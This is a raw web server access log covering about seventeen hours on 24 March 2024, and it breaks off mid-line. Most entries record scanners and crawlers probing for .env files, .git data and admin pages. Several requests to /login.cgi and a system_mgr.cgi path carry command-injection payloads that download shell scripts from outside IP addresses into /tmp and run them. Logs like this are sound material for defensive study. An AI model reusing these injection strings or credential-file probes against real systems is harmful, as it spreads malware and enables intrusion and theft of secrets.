167.86.110.100 - - [24/Mar/2024:01:38:13 +0100] "GET /simple.php HTTP/1.1" 404 298 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 87.121.69.52 - - [24/Mar/2024:01:45:13 +0100] "CONNECT google.com:443 HTTP/1.1" 200 423 "-" "Go-http-client/1.1" 185.224.128.43 - - [24/Mar/2024:01:54:25 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" 83.97.73.245 - - [24/Mar/2024:01:55:26 +0100] "GET /actuator/gateway/routes HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 198.235.24.213 - - [24/Mar/2024:02:32:08 +0100] "GET / HTTP/1.0" 200 423 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 146.19.24.28 - - [24/Mar/2024:02:34:00 +0100] "GET / HTTP/1.1" 200 423 "-" "-" 78.153.140.177 - - [24/Mar/2024:03:09:46 +0100] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 78.153.140.177 - - [24/Mar/2024:03:09:46 +0100] "\x16\x03\x01\x01H\x01" 400 383 "-" "-" 205.210.31.24 - - [24/Mar/2024:03:19:16 +0100] "GET / HTTP/1.1" 200 423 "-" "-" 101.44.249.243 - - [24/Mar/2024:03:40:32 +0100] "GET /index.php?sid=dbfc205b592ec068d7ca3bdf0ce43c1b HTTP/1.1" 200 274 "http://triadian.castlegem.co.uk/index.php?sid=dbfc205b592ec068d7ca3bdf0ce43c1b" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36" 185.191.126.213 - - [24/Mar/2024:04:05:38 +0100] "GET / HTTP/1.1" 200 423 "-" "-" 178.219.117.8 - - [24/Mar/2024:04:13:48 +0100] "GET / HTTP/1.1" 200 423 "-" "-" 146.19.24.28 - - [24/Mar/2024:04:16:28 +0100] "GET / HTTP/1.1" 200 423 "-" "-" 101.44.248.51 - - [24/Mar/2024:04:34:31 +0100] "GET /viewforum.php?f=3&sid=73ef1fb98e296750da0a7205807c3587 HTTP/1.1" 404 295 "http://triadian.castlegem.co.uk/viewforum.php?f=3&sid=73ef1fb98e296750da0a7205807c3587" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36" 45.33.80.243 - - [24/Mar/2024:04:37:33 +0100] "\x16\x03\x01" 400 383 "-" "-" 80.82.78.39 - - [24/Mar/2024:04:54:22 +0100] "GET /ghauri HTTP/1.1" 404 351 "-" "Mozilla/5.0" 156.146.60.22 - - [24/Mar/2024:05:25:26 +0100] "GET /~ridersde/joomla/index.php?option=com_xijc&view=captcha HTTP/1.1" 404 309 "https://www.google.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:91.0) Gecko/20100101 Firefox/91.0" 146.19.24.28 - - [24/Mar/2024:05:46:32 +0100] "GET / HTTP/1.1" 200 423 "-" "-" 146.19.24.28 - - [24/Mar/2024:06:25:13 +0100] "GET / HTTP/1.1" 200 423 "-" "-" 47.128.32.255 - - [24/Mar/2024:06:54:40 +0100] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)" 45.76.146.244 - - [24/Mar/2024:06:54:59 +0100] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.3810.1291 Mobile Safari/537.36" 87.246.7.196 - - [24/Mar/2024:07:04:11 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" 80.94.92.60 - - [24/Mar/2024:07:12:14 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" 109.74.204.123 - - [24/Mar/2024:07:17:59 +0100] "GET / HTTP/1.0" 200 423 "-" "-" 109.74.204.123 - - [24/Mar/2024:07:17:59 +0100] "GET /CSS/Miniweb.css HTTP/1.1" 404 375 "-" "curl/7.54.0" 109.74.204.123 - - [24/Mar/2024:07:17:59 +0100] "GET /Portal/Portal.mwsl HTTP/1.1" 404 378 "-" "curl/7.54.0" 109.74.204.123 - - [24/Mar/2024:07:17:59 +0100] "POST /scripts/WPnBr.dll HTTP/1.1" 404 377 "-" "curl/7.54.0" 109.74.204.123 - - [24/Mar/2024:07:17:59 +0100] "GET / HTTP/1.1" 200 423 "-" "curl/7.54.0" 109.74.204.123 - - [24/Mar/2024:07:17:59 +0100] "GET /nmaplowercheck1711256438 HTTP/1.1" 404 384 "-" "curl/7.54.0" 109.74.204.123 - - [24/Mar/2024:07:17:59 +0100] "GET /docs/cplugError.html/ HTTP/1.1" 404 381 "-" "curl/7.54.0" 109.74.204.123 - - [24/Mar/2024:07:17:59 +0100] "GET / HTTP/1.1" 200 423 "-" "curl/7.54.0" 109.74.204.123 - - [24/Mar/2024:07:17:59 +0100] "GET / HTTP/1.0" 200 423 "-" "-" 109.74.204.123 - - [24/Mar/2024:07:17:59 +0100] "GET /server-status HTTP/1.1" 403 377 "-" "curl/7.54.0" 109.74.204.123 - - [24/Mar/2024:07:17:59 +0100] "GET /inicio.asp HTTP/1.1" 404 370 "-" "curl/7.54.0" 109.74.204.123 - - [24/Mar/2024:07:17:59 +0100] "GET / HTTP/1.1" 200 423 "-" "curl/7.54.0" 109.74.204.123 - - [24/Mar/2024:07:17:59 +0100] "GET /ErTQ HTTP/1.1" 404 364 "-" "curl/7.54.0" 109.74.204.123 - - [24/Mar/2024:07:17:59 +0100] "GET /base.asp HTTP/1.1" 404 368 "-" "curl/7.54.0" 109.74.204.123 - - [24/Mar/2024:07:18:00 +0100] "GET /base.cgi HTTP/1.1" 404 368 "-" "curl/7.54.0" 109.74.204.123 - - [24/Mar/2024:07:18:00 +0100] "GET /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42 HTTP/1.1" 200 3810 "-" "curl/7.54.0" 109.74.204.123 - - [24/Mar/2024:07:18:00 +0100] "GET /localstart.html HTTP/1.1" 404 375 "-" "curl/7.54.0" 109.74.204.123 - - [24/Mar/2024:07:18:00 +0100] "\x16\x03\x01\x02" 400 383 "-" "-" 109.74.204.123 - - [24/Mar/2024:07:18:00 +0100] "GET /start.jsa HTTP/1.1" 404 369 "-" "curl/7.54.0" 109.74.204.123 - - [24/Mar/2024:07:18:00 +0100] "GET /start.pl HTTP/1.1" 404 368 "-" "curl/7.54.0" 109.74.204.123 - - [24/Mar/2024:07:18:00 +0100] "\x16\x03\x01\x02" 400 383 "-" "-" 109.74.204.123 - - [24/Mar/2024:07:18:00 +0100] "GET /rest/applinks/1.0/manifest HTTP/1.1" 404 386 "-" "curl/7.54.0" 109.74.204.123 - - [24/Mar/2024:07:18:00 +0100] "GET /main.aspx HTTP/1.1" 404 369 "-" "curl/7.54.0" 109.74.204.123 - - [24/Mar/2024:07:18:00 +0100] "GET /confluence/rest/applinks/1.0/manifest HTTP/1.1" 404 397 "-" "curl/7.54.0" 109.74.204.123 - - [24/Mar/2024:07:18:00 +0100] "GET /robots.txt HTTP/1.1" 404 370 "-" "curl/7.54.0" 109.74.204.123 - - [24/Mar/2024:07:18:01 +0100] "GET /Portal0000.htm HTTP/1.1" 404 374 "-" "curl/7.54.0" 109.74.204.123 - - [24/Mar/2024:07:18:01 +0100] "\x16\x03\x01\x02" 400 383 "-" "-" 109.74.204.123 - - [24/Mar/2024:07:18:01 +0100] "GET /__Additional HTTP/1.1" 404 372 "-" "curl/7.54.0" 109.74.204.123 - - [24/Mar/2024:07:18:01 +0100] "GET /pools HTTP/1.1" 404 365 "-" "curl/7.54.0" 109.74.204.123 - - [24/Mar/2024:07:18:01 +0100] "\x16\x03\x01\x02" 400 383 "-" "-" 109.74.204.123 - - [24/Mar/2024:07:18:01 +0100] "GET /activities.ico HTTP/1.1" 200 1406 "-" "curl/7.54.0" 109.74.204.123 - - [24/Mar/2024:07:18:01 +0100] "\x16\x03\x01\x02" 400 383 "-" "-" 109.74.204.123 - - [24/Mar/2024:07:18:10 +0100] "\x16\x03\x01\x02" 400 383 "-" "-" 101.44.249.233 - - [24/Mar/2024:07:18:42 +0100] "GET /?p=1 HTTP/1.1" 200 274 "http://food-and-drink.vienna-lodgings.at/?p=1#respond" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36" 185.224.128.43 - - [24/Mar/2024:07:25:06 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" 91.92.254.155 - - [24/Mar/2024:07:26:04 +0100] "GET /modules/mod_rebug/index.html HTTP/1.1" 404 306 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 165.227.236.109 - - [24/Mar/2024:07:27:45 +0100] "\x16\x03\x01\x01\xfc\x01" 400 383 "-" "-" 101.44.250.4 - - [24/Mar/2024:07:36:10 +0100] "GET /?author=1 HTTP/1.1" 200 274 "http://food-and-drink.vienna-lodgings.at/?author=1" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36" 23.224.198.111 - - [24/Mar/2024:07:43:56 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1" 400 296 "-" "hacked-by-matrix" 101.44.251.232 - - [24/Mar/2024:07:50:50 +0100] "GET / HTTP/1.1" 200 274 "http://food-and-drink.vienna-lodgings.at/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36" 87.121.69.52 - - [24/Mar/2024:08:09:10 +0100] "CONNECT google.com:443 HTTP/1.1" 200 423 "-" "Go-http-client/1.1" 34.76.158.233 - - [24/Mar/2024:08:40:56 +0100] "GET / HTTP/1.1" 200 274 "-" "python-requests/2.31.0" 146.19.24.28 - - [24/Mar/2024:09:01:33 +0100] "GET / HTTP/1.1" 200 423 "-" "-" 59.178.194.213 - - [24/Mar/2024:10:23:16 +0100] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 146.19.24.28 - - [24/Mar/2024:10:27:00 +0100] "GET / HTTP/1.1" 200 423 "-" "-" 107.170.230.38 - - [24/Mar/2024:10:52:35 +0100] "MGLNDD_212.69.160.11_80" 400 383 "-" "-" 101.44.251.117 - - [24/Mar/2024:11:01:27 +0100] "GET /index.php?sid=08cbe276f044283cd0c9b8c850faf95f HTTP/1.1" 200 274 "http://triadian.castlegem.co.uk/index.php?sid=08cbe276f044283cd0c9b8c850faf95f" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36" 146.19.24.28 - - [24/Mar/2024:11:04:40 +0100] "GET / HTTP/1.1" 200 423 "-" "-" 158.255.82.220 - - [24/Mar/2024:11:10:14 +0100] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 286 "-" "Hello, World" 80.94.92.60 - - [24/Mar/2024:11:11:47 +0100] "GET /cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=`wget+http://94.156.8.244/wtf.sh;+/bin/sh+wtf.sh` HTTP/1.1" 404 367 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246" 148.153.56.86 - - [24/Mar/2024:11:13:45 +0100] "GET /KBan HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0" 148.153.56.86 - - [24/Mar/2024:11:13:45 +0100] "GET /BapJ HTTP/1.1" 404 281 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0" 148.153.56.86 - - [24/Mar/2024:11:13:45 +0100] "GET /aab8 HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0" 148.153.56.86 - - [24/Mar/2024:11:13:46 +0100] "GET /jquery-3.3.1.slim.min.js HTTP/1.1" 404 295 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0" 148.153.56.86 - - [24/Mar/2024:11:13:46 +0100] "GET /aab9 HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0" 148.153.56.86 - - [24/Mar/2024:11:13:46 +0100] "GET /jquery-3.3.2.slim.min.js HTTP/1.1" 404 296 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0" 80.66.76.196 - - [24/Mar/2024:11:31:05 +0100] "\x03" 400 383 "-" "-" 104.152.52.127 - - [24/Mar/2024:12:07:18 +0100] "GET / HTTP/1.0" 200 423 "-" "masscan/1.3 (https://github.com/robertdavidgraham/masscan)" 101.44.251.82 - - [24/Mar/2024:12:15:11 +0100] "GET /index.php?sid=594b4a34b682c3948fb65241b1546ebe HTTP/1.1" 200 274 "http://triadian.castlegem.co.uk/index.php?sid=594b4a34b682c3948fb65241b1546ebe" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36" 64.62.197.43 - - [24/Mar/2024:12:46:28 +0100] "\x16\x03\x01" 400 383 "-" "-" 65.49.1.64 - - [24/Mar/2024:12:56:37 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0" 65.49.1.54 - - [24/Mar/2024:12:58:30 +0100] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 OPR/95.0.0.0 (Edition Yx 05)" 65.49.1.55 - - [24/Mar/2024:12:59:15 +0100] "GET /geoserver/web/ HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0" 185.224.128.43 - - [24/Mar/2024:13:00:31 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" 95.181.234.17 - - [24/Mar/2024:13:08:57 +0100] "GET /~ridersde/joomla/index.php?option=com_xijc&view=captcha HTTP/1.1" 404 309 "https://www.google.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0" 46.101.105.53 - - [24/Mar/2024:13:54:00 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" 146.19.24.28 - - [24/Mar/2024:14:02:41 +0100] "GET / HTTP/1.1" 200 423 "-" "-" 192.241.200.74 - - [24/Mar/2024:14:02:52 +0100] "GET /manager/text/list HTTP/1.1" 404 289 "-" "Mozilla/5.0 zgrab/0.x" 87.236.176.83 - - [24/Mar/2024:14:04:14 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)" 87.236.176.236 - - [24/Mar/2024:14:04:14 +0100] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)" 87.121.69.52 - - [24/Mar/2024:14:09:19 +0100] "CONNECT google.com:443 HTTP/1.1" 200 423 "-" "Go-http-client/1.1" 45.79.181.94 - - [24/Mar/2024:14:09:32 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 185.170.144.3 - - [24/Mar/2024:14:37:41 +0100] "\x03" 400 383 "-" "-" 45.227.254.8 - - [24/Mar/2024:14:56:27 +0100] "\x03" 400 383 "-" "-" 78.153.47.184 - - [24/Mar/2024:15:08:06 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://193.35.18.164/klausschwab.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 296 "-" "linus-torvalds-loves-you" 87.120.84.69 - - [24/Mar/2024:15:21:31 +0100] "GET /protected/.env HTTP/1.1" 404 359 "-" "fasthttp" 87.120.84.69 - - [24/Mar/2024:15:21:36 +0100] "GET /newsite/.env HTTP/1.1" 404 357 "-" "fasthttp" 87.120.84.69 - - [24/Mar/2024:15:21:41 +0100] "GET /www/.env HTTP/1.1" 404 353 "-" "fasthttp" 87.120.84.69 - - [24/Mar/2024:15:21:46 +0100] "GET /sites/all/libraries/mailchimp/.env HTTP/1.1" 404 379 "-" "fasthttp" 87.120.84.69 - - [24/Mar/2024:15:21:51 +0100] "GET /database/.env HTTP/1.1" 404 358 "-" "fasthttp" 87.120.84.69 - - [24/Mar/2024:15:21:56 +0100] "GET /public/.env HTTP/1.1" 404 356 "-" "fasthttp" 87.120.84.69 - - [24/Mar/2024:15:22:01 +0100] "GET /__tests__/test-become/.env HTTP/1.1" 404 371 "-" "fasthttp" 87.120.84.69 - - [24/Mar/2024:15:22:05 +0100] "GET /redmine/.env HTTP/1.1" 404 357 "-" "fasthttp" 87.120.84.69 - - [24/Mar/2024:15:22:09 +0100] "GET /gists/cache HTTP/1.1" 404 356 "-" "fasthttp" 87.120.84.69 - - [24/Mar/2024:15:22:14 +0100] "GET /uploads/.env HTTP/1.1" 404 357 "-" "fasthttp" 87.120.84.69 - - [24/Mar/2024:15:22:19 +0100] "GET /lib/.env HTTP/1.1" 404 353 "-" "fasthttp" 87.120.84.69 - - [24/Mar/2024:15:22:24 +0100] "GET /sendgrid.env HTTP/1.1" 404 357 "-" "fasthttp" 87.120.84.69 - - [24/Mar/2024:15:22:29 +0100] "GET /aws.env HTTP/1.1" 404 352 "-" "fasthttp" 87.120.84.69 - - [24/Mar/2024:15:22:34 +0100] "GET /.env.example HTTP/1.1" 404 357 "-" "fasthttp" 87.120.84.69 - - [24/Mar/2024:15:22:39 +0100] "GET /main/.env HTTP/1.1" 404 354 "-" "fasthttp" 87.120.84.69 - - [24/Mar/2024:15:22:44 +0100] "GET /docs/.env HTTP/1.1" 404 354 "-" "fasthttp" 87.120.84.69 - - [24/Mar/2024:15:22:49 +0100] "GET /client/.env HTTP/1.1" 404 356 "-" "fasthttp" 87.120.84.69 - - [24/Mar/2024:15:22:54 +0100] "GET /.env.dev HTTP/1.1" 404 353 "-" "fasthttp" 87.120.84.69 - - [24/Mar/2024:15:22:59 +0100] "GET /blogs/.env HTTP/1.1" 404 355 "-" "fasthttp" 87.120.84.69 - - [24/Mar/2024:15:23:04 +0100] "GET /shared/.env HTTP/1.1" 404 356 "-" "fasthttp" 87.120.84.69 - - [24/Mar/2024:15:23:09 +0100] "GET /download/.env HTTP/1.1" 404 358 "-" "fasthttp" 87.120.84.69 - - [24/Mar/2024:15:23:14 +0100] "GET /.env.php HTTP/1.1" 404 353 "-" "fasthttp" 87.120.84.69 - - [24/Mar/2024:15:23:19 +0100] "GET /site/.env HTTP/1.1" 404 354 "-" "fasthttp" 87.120.84.69 - - [24/Mar/2024:15:23:24 +0100] "GET /sites/.env HTTP/1.1" 404 355 "-" "fasthttp" 87.120.84.69 - - [24/Mar/2024:15:23:29 +0100] "GET /web/.env HTTP/1.1" 404 353 "-" "fasthttp" 146.19.24.28 - - [24/Mar/2024:15:28:00 +0100] "GET / HTTP/1.1" 200 423 "-" "-" 101.44.251.40 - - [24/Mar/2024:15:30:18 +0100] "GET /index.php?sid=27c27be7566288b70d51e190419bc1b4 HTTP/1.1" 200 274 "http://triadian.castlegem.co.uk/index.php?sid=27c27be7566288b70d51e190419bc1b4" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36" 80.66.77.235 - - [24/Mar/2024:15:58:56 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 zgrab/0.x" 80.66.77.235 - - [24/Mar/2024:16:15:40 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 zgrab/0.x" 101.44.251.61 - - [24/Mar/2024:16:34:37 +0100] "GET /viewtopic.php?p=4117&sid=0ca628b2ae5a9caaa14c3c45f7aa92b4 HTTP/1.1" 404 295 "http://triadian.castlegem.co.uk/viewtopic.php?p=4117&sid=0ca628b2ae5a9caaa14c3c45f7aa92b4#p4117" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36" 101.44.251.12 - - [24/Mar/2024:16:54:46 +0100] "GET /index.php?sid=1e8c8f7ca2458050694af603bc17d6cb HTTP/1.1" 200 274 "http://triadian.castlegem.co.uk/index.php?sid=1e8c8f7ca2458050694af603bc17d6cb" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36" 80.13.153.140 - - [24/Mar/2024:16:55:55 +0100] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 167.94.146.59 - - [24/Mar/2024:17:04:58 +0100] "GET / HTTP/1.1" 200 423 "-" "-" 167.94.146.59 - - [24/Mar/2024:17:05:01 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 167.94.146.59 - - [24/Mar/2024:17:05:01 +0100] "PRI * HTTP/2.0" 400 383 "-" "-" 167.94.146.59 - - [24/Mar/2024:17:05:01 +0100] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 167.94.146.59 - - [24/Mar/2024:17:05:01 +0100] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 101.44.251.54 - - [24/Mar/2024:17:05:21 +0100] "GET /index.php?sid=ed1db84ed2dfc667d7370927541ccc18 HTTP/1.1" 200 274 "http://triadian.castlegem.co.uk/index.php?sid=ed1db84ed2dfc667d7370927541ccc18" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36" 80.13.153.140 - - [24/Mar/2024:17:25:24 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 80.13.153.140 - - [24/Mar/2024:17:25:35 +0100] "GET /owa/auth/logon.aspx HTTP/1.1" 404 291 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 80.13.153.140 - - [24/Mar/2024:17:25:47 +0100] "GET /.git/index HTTP/1.1" 404 285 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 80.13.153.140 - - [24/Mar/2024:17:25:58 +0100] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 80.13.153.140 - - [24/Mar/2024:17:26:09 +0100] "GET /centreon/ HTTP/1.1" 404 282 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 80.13.153.140 - - [24/Mar/2024:17:26:29 +0100] "GET /.well-known/security.txt HTTP/1.1" 404 295 "-" "Mozilla/5.0 ANSSI security.txt fetch (https://www.cert.ssi.gouv.fr/scans/)" 37.139.5.66 - - [24/Mar/2024:17:26:37 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://193.35.18.164/klausschwab.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 296 "-" "linus-torvalds-loves-you" 146.19.24.28 - - [24/Mar/2024:17:33:54 +0100] "GET / HTTP/1.1" 200 423 "-" "-" 92.154.95.236 - - [24/Mar/2024:17:48:10 +0100] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 185.224.128.43 - - [24/Mar/2024:17:51:54 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" 167.99.59.54 - - [24/Mar/2024:17:56:48 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" 162.216.150.148 - - [24/Mar/2024:18:13:20 +0100] "GET / HTTP/1.1" 200 423 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 92.154.95.236 - - [24/Mar/2024:18:35:06 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 92.154.95.236 - - [24/Mar/2024:18:35:18 +0100] "GET /owa/auth/logon.aspx HTTP/1.1" 404 291 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 92.154.95.236 - - [24/Mar/2024:18:35:29 +0100] "GET /.git/index HTTP/1.1" 404 285 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 92.154.95.236 - - [24/Mar/2024:18:35:41 +0100] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 92.154.95.236 - - [24/Mar/2024:18:35:52 +0100] "GET /centreon/ HTTP/1.1" 404 282 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 92.154.95.236 - - [24/Mar/2024:18:36:12 +0100] "GET /.well-known/security.txt HTTP/1.1" 404 295 "-" "Mozilla/5.0 ANSSI security.txt fetch (https://www.cert.ssi.gouv.fr/scans/)" 198.74.56.46 - - [24/Mar/2024:18:39:27 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 zgrab/0.x" 157.143.90.243 - - [24/Mar/2024:18:39:45 +0100] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 172.104.11.4 - - [24/Mar/2024:18:53:16 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 